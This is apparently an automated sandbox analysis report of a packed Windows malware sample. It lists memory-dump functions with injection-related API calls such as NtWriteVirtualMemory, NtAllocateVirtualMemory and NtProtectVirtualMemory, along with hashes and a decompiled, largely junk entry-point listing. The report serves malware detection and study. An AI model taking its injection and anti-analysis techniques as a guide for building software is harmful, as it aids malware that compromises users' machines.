^, xrefs: 020F0B54

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: ^=b$^
API String ID: 1029625771-3094246518
Opcode ID: 5f42caea7625df60cec284c9cb5606c6b2a5496d0588dfe36a6b20df3711f446
Instruction ID: 8b1017c6f5afb960702b46b9ad6f62d6476020d18512a99e31b132d05fc6ab82
Opcode Fuzzy Hash: 5f42caea7625df60cec284c9cb5606c6b2a5496d0588dfe36a6b20df3711f446
Instruction Fuzzy Hash: E2B12472A44349DFDFB0AF74CC807DEB7E2AF58310F55442ADD88AB614D7309A819B42

Uniqueness

Uniqueness Score: -1.00%

Function 020F4BC9, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 293COMMON

Download Yara Rule

Strings

`~vG, xrefs: 020F4FB1
}W31, xrefs: 020F4DD7

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `~vG$}W31
API String ID: 0-4278674903
Opcode ID: 61d81662eeba4bb5bd115ce61f7e42d153f47aa147a4a7e4b309103ba1cb44f6
Instruction ID: a35e9c24e64347f41be84f192b504caaad0b5e890ea6c685218447e04d08ce9d
Opcode Fuzzy Hash: 61d81662eeba4bb5bd115ce61f7e42d153f47aa147a4a7e4b309103ba1cb44f6
Instruction Fuzzy Hash: BED1DAB2A44388DFDFB58F68DD847DE7BA2BF18340F45412ADD899B610D7709A848F42

Uniqueness

Uniqueness Score: -1.00%

Function 020F05A1, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 292COMMON

Download Yara Rule

APIs

EnumWindows.USER32(?,?,00000000,020F94D3,020F0773,00000000), ref: 020F05D9

Strings

^=b, xrefs: 020F0AB9
^, xrefs: 020F0B54

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: ^=b$^
API String ID: 1129996299-3094246518
Opcode ID: fc38e2703f8e71da0894f95aace4f4b7edef5548db654082f5734b5770cf8f65
Instruction ID: 550bc9d3f6639c8acc5d6f8106d96f707584fd389d321c073dfe65bf02e419e0
Opcode Fuzzy Hash: fc38e2703f8e71da0894f95aace4f4b7edef5548db654082f5734b5770cf8f65
Instruction Fuzzy Hash: 48B13472644348DFDBA09F68CC80BDEB7E2EF59310F45402ADD89AB614D7309A819B42

Uniqueness

Uniqueness Score: -1.00%

Function 020F5781, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00008FA6,0645EE0F,199234A5), ref: 020F5878

Strings

^=b, xrefs: 020F0AB9
^, xrefs: 020F0B54

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: ^=b$^
API String ID: 823142352-3094246518
Opcode ID: 725cda510b5f90f16a6f38806a98993e23aaf4cb43ce09a8e437bf08e51862c2
Instruction ID: 0f8c6afba0e1c9107fa1043569b74c56f2200220c266dbaa3f1154dcb172ed19
Opcode Fuzzy Hash: 725cda510b5f90f16a6f38806a98993e23aaf4cb43ce09a8e437bf08e51862c2
Instruction Fuzzy Hash: 96B13372944344DFDBA09F24CC80BEEBBE2EF58350F56442EDD89AB615D3704E819B42

Uniqueness

Uniqueness Score: -1.00%

Function 020F4DB6, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,7DF508C5,?,00000000,?,?,?,?,D64511AE), ref: 020F50DE

Strings

`~vG, xrefs: 020F4FB1
}W31, xrefs: 020F4DD7

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: `~vG$}W31
API String ID: 3527976591-4278674903
Opcode ID: 704e6dd1a8c59189dd5966c1e648c08d3221fb39421ff8fe1c342f40e9253c41
Instruction ID: 4ba3246ed908b3f36acfb8b5c93fda4dd9b80f47c68527c8bd3d97ebd1b1e7ab
Opcode Fuzzy Hash: 704e6dd1a8c59189dd5966c1e648c08d3221fb39421ff8fe1c342f40e9253c41
Instruction Fuzzy Hash: 4AB1CCB2640388DFDFB58F68DD84BDA3BA2BF58340F44412ADD8D9B650D7709A848F41

Uniqueness

Uniqueness Score: -1.00%

Function 020F3874, Relevance: 5.4, Strings: 4, Instructions: 428COMMON

Download Yara Rule

Strings

+ <, xrefs: 020F38BD
^=b, xrefs: 020F0AB9
^, xrefs: 020F0B54
vq, xrefs: 020F9C56

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: + <$^=b$ vq$^
API String ID: 0-2203881996
Opcode ID: cb4f1301b418f483ce39c84379a35b03959259d0155e10904c53424182327ed8
Instruction ID: 6cc8bece357c07e1ac84435595c737aa639563193114c2d2474ae2f2ccbec2cb
Opcode Fuzzy Hash: cb4f1301b418f483ce39c84379a35b03959259d0155e10904c53424182327ed8
Instruction Fuzzy Hash: E5022172644348DFDBA4AF35C884BEEBBA2FF55310F16401EDD899B665D3309A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F5968, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020F73C3: LoadLibraryA.KERNELBASE(?,47E8E701,?,020F06C1,00000000,020F0211), ref: 020F74B9

NtAllocateVirtualMemory.NTDLL(-00000001A3861579), ref: 020F5BA5

Strings

`~vG, xrefs: 020F4FB1
}W31, xrefs: 020F4DD7

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: `~vG$}W31
API String ID: 2616484454-4278674903
Opcode ID: bdb038aead7cde1b31969c9141ebf74346f74f31a6cdd63c2ebc47e7a8eb8203
Instruction ID: a9ba9ecbde85eeadd1608ada56ef1da0afab0ecb6dc3e8da77b71cc551c5bc40
Opcode Fuzzy Hash: bdb038aead7cde1b31969c9141ebf74346f74f31a6cdd63c2ebc47e7a8eb8203
Instruction Fuzzy Hash: 4941BE71644385DFDB709E28CC84BEE7BE2EF56324F44422DDD8A9B264D3308A80DB46

Uniqueness

Uniqueness Score: -1.00%

Function 020F5D78, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 283libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 020F5968: NtAllocateVirtualMemory.NTDLL(-00000001A3861579), ref: 020F5BA5

LoadLibraryA.KERNELBASE(?,47E8E701,?,020F06C1,00000000,020F0211), ref: 020F74B9

Strings

G(J, xrefs: 020F60ED

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: G(J
API String ID: 2616484454-847150595
Opcode ID: 02fa72410816c3f1408772e731ef643bf826d782703a826cea2e7961c4c21f2b
Instruction ID: 0dc0b27b42f467fc5fac597fbece55a26c2cf012526fc618823d417bff09a429
Opcode Fuzzy Hash: 02fa72410816c3f1408772e731ef643bf826d782703a826cea2e7961c4c21f2b
Instruction Fuzzy Hash: 37C1DE71A4438A9FCBB49F24DD54BEE7BA2FF08350F45442DEE89AB610D7309A40DB52

Uniqueness

Uniqueness Score: -1.00%

Function 020F0211, Relevance: 2.8, Strings: 2, Instructions: 259COMMON

Download Yara Rule

Strings

^=b, xrefs: 020F0AB9
^, xrefs: 020F0B54

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ^=b$^
API String ID: 0-3094246518
Opcode ID: 96e7861c38d26cf0951da81879aeed50b26e464bbb87cde71f84ab73801c4e09
Instruction ID: d1377ecf7e6586efe9472de91c995b1beb2c120c44fa80e71e667fbf1b0f7433
Opcode Fuzzy Hash: 96e7861c38d26cf0951da81879aeed50b26e464bbb87cde71f84ab73801c4e09
Instruction Fuzzy Hash: 7AA15572544308DFDBA4AF64CC80BEEB7E3EF58310F164429DD89AB615D7348D829B42

Uniqueness

Uniqueness Score: -1.00%

Function 020F0921, Relevance: 2.6, Strings: 2, Instructions: 137COMMON

Download Yara Rule

Strings

^=b, xrefs: 020F0AB9
^, xrefs: 020F0B54

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ^=b$^
API String ID: 0-3094246518
Opcode ID: 82733af89d02f7682091e7ffe0dbe118d22879498ff823652061b2761737dfa5
Instruction ID: ff55b46499cd8ef272d11ce191488d88435d0f71c16c2d6b4a4d2007feb27122
Opcode Fuzzy Hash: 82733af89d02f7682091e7ffe0dbe118d22879498ff823652061b2761737dfa5
Instruction Fuzzy Hash: D65113726403888BDFB49F24CC80BDE77A3AF58354F55402ADE88AB715D3309E82AB51

Uniqueness

Uniqueness Score: -1.00%

Function 020F94D8, Relevance: 1.7, APIs: 1, Instructions: 188COMMON

Download Yara Rule

APIs

K32GetDeviceDriverBaseNameA.KERNEL32 ref: 020F986D

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: BaseDeviceDriverName
String ID:
API String ID: 2335996259-0
Opcode ID: 0b95e6ca7c0cd9cfb7071aa5c2daa2dd236ffff7edbf45633bdc181b0cee99a5
Instruction ID: 0bc641ca7f83ebf15e7deeea0fb44f727720df906ff0312a4149b0a1af259de8
Opcode Fuzzy Hash: 0b95e6ca7c0cd9cfb7071aa5c2daa2dd236ffff7edbf45633bdc181b0cee99a5
Instruction Fuzzy Hash: CB71D571A407898FDBBACE78C9947DA37A3BF89310F518629CD09CBA58D330DA458B51

Uniqueness

Uniqueness Score: -1.00%

Function 020F95C6, Relevance: 1.7, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

K32GetDeviceDriverBaseNameA.KERNEL32 ref: 020F986D

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: BaseDeviceDriverName
String ID:
API String ID: 2335996259-0
Opcode ID: c8d4f69e530b87711bdc2af47ed320e619497e4c8738294dbf5fc24864a64ccb
Instruction ID: c9a926c004cf3c9ac6088adf4a75c08975953f7a8e187f4513ebd7a228304e25
Opcode Fuzzy Hash: c8d4f69e530b87711bdc2af47ed320e619497e4c8738294dbf5fc24864a64ccb
Instruction Fuzzy Hash: 4661E771A407888FDBBACE64C9947DA77A3BF89310F55C22ACD0DCBA54D330DA418B91

Uniqueness

Uniqueness Score: -1.00%

Function 020F3BFF, Relevance: 1.6, APIs: 1, Instructions: 120libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,47E8E701,?,020F06C1,00000000,020F0211), ref: 020F74B9

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3d0d8cb8f45b45677d85e202ebf3f7ed91970e8ea84fe42c1372b25850ee9ab4
Instruction ID: ea0fb25473517a85dcbc63aa3575a3b5cce3ab654578de45bc0ded1cfecff8ee
Opcode Fuzzy Hash: 3d0d8cb8f45b45677d85e202ebf3f7ed91970e8ea84fe42c1372b25850ee9ab4
Instruction Fuzzy Hash: 8E41E275A443499FDFB4DF38CD847EE77A2EF48310F81402AED88DB655C7309A418A46

Uniqueness

Uniqueness Score: -1.00%

Function 020F6568, Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 020F65E4

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 16f8735892d04a2158479f2e4cc56bb5f031e5e44a705a7414574f6b3967fa6c
Instruction ID: 9470a30e1927f5b19cd4f2fe98dde3fd1494a7aef062ea85fe9a8cd7e3f07ac3
Opcode Fuzzy Hash: 16f8735892d04a2158479f2e4cc56bb5f031e5e44a705a7414574f6b3967fa6c
Instruction Fuzzy Hash: 4701FEB68C47816BC7826A300CE97F93F8A5F52604FE51298CAD05BCC7D6008582E7C0

Uniqueness

Uniqueness Score: -1.00%

Function 020F8FBB, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-C65F0877,?,?,?,?,020F8606,BB801ED8,020F44EE), ref: 020F911E

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 256d17de555bf6fe8bccda383c2d8409ea9d31291abef1e389458ad8e078400f
Instruction ID: 35b4713f81218edb535df42134b03c6975b60977b2926033a133c28e7cbe9688
Opcode Fuzzy Hash: 256d17de555bf6fe8bccda383c2d8409ea9d31291abef1e389458ad8e078400f
Instruction Fuzzy Hash: 4101ECB17043899FDB34CE19CDC8BDBB6E9AB9C301F458129990C9B706DBB09F00DA11

Uniqueness

Uniqueness Score: -1.00%

Function 020F90E6, Relevance: 1.5, APIs: 1, Instructions: 15nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(-C65F0877,?,?,?,?,020F8606,BB801ED8,020F44EE), ref: 020F911E

Memory Dump Source

Source File: 00000001.00000002.773585208.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 541393db9e6fed06ceeb67ae2f5f420df068206d30c43de3adf57747d6357be0
Instruction ID: 6c01cc596e05fb3fdf7835e38d435fe9be29e7bff67aaa7a07d157c3ebfc8898
Opcode Fuzzy Hash: 541393db9e6fed06ceeb67ae2f5f420df068206d30c43de3adf57747d6357be0
Instruction Fuzzy Hash: 15D05EB120071807C730CD288DCDFCBA5A82F2C282F8243244D9C96706D7704A005421

Uniqueness

Uniqueness Score: -1.00%

Function 00401144, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 59%

			_entry_(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr* _t66;
				signed int _t67;
				signed int _t68;
				signed char _t69;
				signed int _t72;
				signed char _t74;
				signed char _t78;
				signed int _t79;
				signed int _t80;
				signed int _t83;
				void* _t88;
				intOrPtr* _t89;
				void* _t94;
				signed int* _t95;
				void* _t97;
				void* _t99;
				signed char _t102;
				signed int _t108;
				signed int _t109;
				signed char _t110;
				signed int _t112;
				void* _t118;
				signed int* _t119;
				void* _t124;
				intOrPtr* _t131;
				intOrPtr* _t132;
				void* _t138;
				void* _t139;
				signed int* _t145;
				signed int* _t147;
				signed int* _t149;
				signed int* _t151;
				void* _t154;
				void* _t155;
				intOrPtr* _t161;
				intOrPtr* _t163;
				void* _t165;
				intOrPtr* _t167;
				void* _t168;
				signed int _t181;
				void* _t182;
				signed int _t191;
				void* _t193;
				void* _t194;
				void* _t195;
				signed int _t196;
				intOrPtr* _t208;
				intOrPtr* _t209;
				signed int _t211;
				signed char _t216;
				intOrPtr* _t220;
				signed int _t225;

				_push("VB5!6&*"); // executed
				L0040113E(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t66 = __eax + 1;
				 *_t66 =  *_t66 + _t66;
				 *_t66 =  *_t66 + _t66;
				 *_t66 =  *_t66 + _t66;
				 *((intOrPtr*)(__edx - 0x2d91e317)) =  *((intOrPtr*)(__edx - 0x2d91e317)) + __ebx;
				_t67 = _t66 -  *0x039CA936;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *__ecx =  *__ecx + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *((intOrPtr*)(__ebx + 0x4f)) =  *((intOrPtr*)(__ebx + 0x4f)) + _t67;
				_t88 = __ebx + 1 - 1;
				_pop(_t97);
				_push(0xd26e1ce9);
				 *((intOrPtr*)(_t182 + 0x76)) =  *((intOrPtr*)(_t182 + 0x76)) + _t97;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				_t194 = _t193 - 1;
				 *_t67 =  *_t67 ^ _t67;
				es = _t88;
				asm("pushfd");
				asm("arpl [edi-0x5ff889ac], si");
				asm("adc eax, 0xb00ef4e9");
				asm("sbb edi, ecx");
				_t89 = _t88 + 1;
				asm("movsd");
				asm("insd");
				asm("cdq");
				asm("iretw");
				asm("adc [edi+0xaa000c], esi");
				asm("pushad");
				asm("rcl dword [ebx], cl");
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				_pop(_t99);
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				_t68 = _t67 |  *_t67;
				_push(0xd26e1ce9);
				_push(_t194);
				_push(_t89);
				_push(_t68);
				_push(0xd26e1ce9);
				_t102 = _t99 + 1;
				 *0x53000f01 =  *0x53000f01 + _t102;
				_push(_t194);
				_t195 = _t194 + 1;
				_t124 = __edi + 1;
				_push(0xd26e1ce9);
				_push(_t195);
				_push(0xd26e1ce9);
				_t196 = _t195 + 1;
				_push(0xd26e1ce9);
				_t181 = __esi - 0xffffffffffffffff + 1 - 1;
				_push(_t89);
				 *_t102 =  *_t102 + _t89;
				 *_t68 =  *_t68 + _t68;
				 *_t89 =  *_t89 + _t68;
				asm("ficom word [edi]");
				 *((intOrPtr*)(_t196 + _t181 * 2)) =  *((intOrPtr*)(_t196 + _t181 * 2)) + _t102;
				_push(_t124);
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				_push(es);
				 *_t68 =  *_t68 + 0xffffffffa4dc39d4;
				 *_t68 =  *_t68 ^ _t68;
				 *_t102 =  *_t102 + _t68;
				 *_t68 =  *_t68 + _t102;
				 *((intOrPtr*)(_t68 + 0x6600000e)) =  *((intOrPtr*)(_t68 + 0x6600000e)) + _t102;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 & _t68;
				 *_t102 =  *_t102 + _t68;
				 *_t68 =  *_t68 + _t102;
				 *((intOrPtr*)(_t68 + 0xe000008)) =  *((intOrPtr*)(_t68 + 0xe000008)) + _t102;
				asm("sldt word [eax]");
				asm("adc [eax], dl");
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 | _t68;
				ss = 0xb6000005;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 ^ 0xffffffffa4dc39d4;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 & _t68;
				 *_t68 =  *_t68 + _t68;
				_push(ds);
				asm("sbb eax, 0x20200000");
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 & _t68;
				 *_t68 =  *_t68 + _t68;
				 *((char*)(0xffffffffa4dc39d4)) = 0;
				asm("adc [eax], dl");
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 & _t68;
				_push(0x6e000004);
				_push(_t89);
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 - _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 ^ _t68;
				 *_t68 =  *_t68 + _t68;
				asm("pushad");
				 *_t68 =  *_t68 + _t68;
				 *_t102 =  *_t102 + _t68;
				 *_t68 =  *_t68 + _t102;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 | _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				_pop(_t94);
				_t95 = _t94 + 1;
				_push(0x63a52703);
				_t118 = _t181;
				asm("outsd");
				_push(_t196);
				_push(_t181);
				_t131 = _t124 - 0xfffffffffffffffb;
				_t191 =  *(_t196 + 0xffffffffa4dc3a21) * 0x7d;
				if(_t191 < 0) {
					L17:
					_t102 = _t102 -  *_t131;
					_t216 = _t102;
					if(_t216 > 0) {
						goto L35;
					} else {
						asm("daa");
						asm("das");
						if(_t216 <= 0) {
							goto L36;
						} else {
							asm("aas");
							_t181 = _t181 &  *(_t68 + 0x4f);
							goto L20;
						}
					}
				} else {
					_t167 = _t131 - 1;
					_t208 = _t167;
					if(_t208 >= 0) {
						L15:
						_t167 = _t167 - 1;
						goto L16;
					} else {
						if(_t208 != 0) {
							L16:
							_t131 = _t167 - 1;
							goto L17;
						} else {
							_push(0x7f4f6c68);
							asm("popad");
							_push(0x4f);
							if(_t208 != 0) {
								L28:
								_t68 = _t68 - 0x51;
								_t102 = _t102 ^  *(_t167 + 0x10);
								goto L29;
							} else {
								_t167 = _t167 - 1;
								_t209 = _t167;
								if(_t209 == 0) {
									L27:
									asm("adc ecx, [edi+0x10]");
									_push(_t118);
									 *(_t167 + 0x11) =  *(_t167 + 0x11) & _t102;
									_push(_t118);
									goto L28;
								} else {
									if(_t209 > 0) {
										L20:
										_t165 = _t131 - 1;
										_push(es);
										 *[fs:edi+0x1f] =  *[fs:edi+0x1f] | _t102;
										goto L21;
									} else {
										if(_t209 == 0) {
											L29:
											_t168 = _t167 - 1;
											asm("adc [edx+0x25], ch");
											goto L30;
										} else {
											if(_t209 >= 0) {
												L21:
												_t163 = _t165 - 1;
												_pop(ds);
												asm("popad");
												_t102 = _t102 +  *((intOrPtr*)(_t163 + 2));
												if(_t102 < 0) {
													_t163 = _t163 - 1;
													_t220 = _t163;
													_push(ds);
													if(_t220 > 0) {
														_t163 = _t163 - 1;
														asm("sbb [esi+0x1b], ah");
													}
													asm("sbb cx, [edi+0x16]");
												}
												if(_t220 == 0) {
													_t167 = _t163 - 1;
													_t68 = _t68 - 0x74;
													goto L27;
												}
												goto L31;
											} else {
												_push(cs);
												if(_t209 >= 0) {
													goto L27;
												} else {
													_t163 = _t167 - 1;
													asm("pcmpgtb mm6, [ebx+0x4f]");
													_t83 = _t68 | 0x1f4f7973;
													if(_t83 < 0) {
														L32:
														if(_t225 >= 0) {
															goto L38;
														} else {
															goto L33;
														}
													} else {
														asm("sbb eax, [ebx]");
														ss = _t196;
														_push(ds);
														_push(_t83);
														_t102 = _t102 |  *_t181;
														asm("popad");
														asm("sbb al, 0x1b");
														_t167 = _t163 - 0xfffffffffffffffd;
														 *0xd26e1ce9 =  *0xd26e1ce9 | _t102;
														_t211 =  *0xd26e1ce9;
														if(_t211 != 0) {
															goto L29;
														} else {
															asm("sbb eax, [edi]");
															if(_t211 == 0) {
																L30:
																asm("daa");
																asm("daa");
																_t163 = _t168 -  *((intOrPtr*)(_t102 + 0x2d));
																L31:
																_t83 = _t68 - 0x2d732a4f;
																_t225 = _t83;
																goto L32;
															} else {
																asm("sbb [ebx+esi*2], ebx");
																asm("adc al, 0x65");
																_t163 = _t167;
																_push(ss);
																if(_t163 <= 0) {
																	L33:
																	_t163 = _t163 - 1;
																	if(_t163 < 0) {
																		L39:
																		asm("sbb [eax], bl");
																		asm("sbb [edi+0x2e], ecx");
																		asm("sbb [edi+ecx*2], al");
																		asm("movups [edi+0x2d], xmm1");
																		es = ss;
																		asm("adc [edi+0x26], cl");
																		_t132 = _t163;
																		_t69 = _t83 - 0x274f1309 + 0x00000013 & 0x314f111b;
																	} else {
																		 *(_t118 + 0x24) =  *(_t118 + 0x24) & _t181;
																		_t131 = _t163;
																		asm("daa");
																		_push(0x33);
																		L35:
																		_t131 = _t131 - 1;
																		asm("aaa");
																		asm("popad");
																		L36:
																		_t132 = _t131 - 1;
																		_t69 = _t68 & 0x00000074;
																		if(_t102 <  *((intOrPtr*)(_t132 + 0x24))) {
																			_t161 = _t132 - 1;
																			 *(_t161 + 0x18) =  *(_t161 + 0x18) | _t102;
																			_t83 = _t69 ^ 0x0000007f | 0x00000006;
																			ss = es;
																			asm("sbb [ebx], ecx");
																			_t163 = _t161;
																			_push(ss);
																			_push(cs);
																			asm("sbb [edi+0x13], ecx");
																			L38:
																			asm("adc ecx, [esi+edx]");
																			goto L39;
																		}
																	}
																} else {
																	_t68 = _t83 & 0x324f6c2e;
																	goto L15;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				asm("adc [edi+0x31], ecx");
				asm("adc [ecx], dl");
				_t72 = _t69 - 0x0000002c + 0x0000004f ^ 0x274f0d33;
				asm("daa");
				asm("sbb cl, [edi+0x3d]");
				_t119 = _t118 -  *_t72;
				asm("adc al, 0x4f");
				_t74 = _t72 - 0x2d05284f &  *0xf224f2b;
				asm("daa");
				 *_t119 =  *_t119 & _t74;
				 *[ds:ebx] =  *[ds:ebx] | _t191;
				_t138 = _t132 - 0xfffffffffffffffc;
				_t139 = _t138 - 1;
				asm("adc al, 0x2d");
				asm("aaa");
				asm("sbb al, 0x25");
				_t108 = (_t102 -  *0xc244f2e -  *((intOrPtr*)(_t138 + 0x3c)) ^  *_t119) &  *(_t139 + 0x3c) &  *(_t139 + 0x22) &  *_t95;
				asm("sbb edi, [ebx]");
				 *[es:ecx] =  *[es:ecx] - _t108;
				 *0x2a394f2e =  *0x2a394f2e ^ _t196;
				_t78 = ((_t74 | 0x00000021) + 0x02354f24 ^ 0x00000008) & 0x2127394f;
				_t145 = _t139 - 0xfffffffffffffffc;
				 *0x36364f24 =  *0x36364f24 ^ _t196;
				_t109 = _t108 - _t145[0xd];
				asm("retf");
				asm("pushad");
				_t147 = _t145;
				asm("int 0x37");
				if(_t147 <= 0) {
					L46:
					asm("rol eax, 0x36");
					_t149 = _t147;
					asm("rcr dh, 0x3d");
					L47:
					asm("fidivr word [0x38d7d84f]");
					asm("out dx, eax");
					 *_t109 =  *_t109 >> 1;
					_t151 = _t149;
					L45:
					asm("fcmovu st0, st4");
					_pop(ss);
					_t147 = _t151 - 0xffffffffffffffff;
					asm("ffreep st0");
					_t109 = _t109 -  *((intOrPtr*)(_t147 - 0x25));
					 *_t147 =  *_t147 << 0x4f;
					asm("fstp1 st2");
					 *((intOrPtr*)(_t147 - 0x3f)) =  *((intOrPtr*)(_t147 - 0x3f)) - _t109;
					goto L46;
				}
				asm("int 0x4");
				_t79 = _t78 ^ 0x0000004f;
				asm("invalid");
				_t154 = _t147 - 1;
				asm("fist word [ebx]");
				_t110 = _t109 ^  *(_t154 - 0x36);
				asm("iretd");
				 *_t95 =  *_t95 ^ _t110;
				asm("daa");
				asm("daa");
				_t112 = _t110 -  *(_t154 - 0x36) ^  *(_t154 - 0x3c);
				 *(_t154 + 0x30) =  *(_t154 + 0x30) | _t112;
				asm("into");
				_t109 = _t112 &  *(_t154 - 0x3d);
				asm("retf");
				if(_t109 < 0) {
					goto L49;
				} else {
					asm("invalid");
					_t151 = _t154 - 1;
					asm("enter 0x17ca, 0x4f");
					asm("ffreep st5");
					asm("sbb al, 0x4f");
					goto L45;
				}
				while(1) {
					L49:
					_t155 = _t154 - 1;
					asm("invalid");
					 *(_t155 + 0x28) =  *(_t155 + 0x28) ^ _t109;
					_push(_t109);
					asm("int3");
					_t149 = _t155 - 1;
					_t80 = _t79 & 0x0000006e;
					asm("enter 0x3c4f, 0x67");
					asm("lds ecx, [edi+0x35]");
					if(_t80 != 0) {
						goto L47;
					}
					_t154 = _t149 - 1;
					_t79 = _t80 ^ 0x324fde63;
					if(_t79 != 0) {
						 *(_t154 - 7) =  *(_t154 - 7) ^ _t109;
						asm("stc");
						continue;
					}
					asm("int 0x71");
					asm("ror byte [edi-0x36], 0x77");
					asm("fimul dword [edi-0x21]");
					asm("fbstp tword [eax-0x2d]");
				}
				goto L47;
			}

0x00401144
0x00401149
0x0040114e
0x00401150
0x00401152
0x00401154
0x00401156
0x00401158
0x00401159
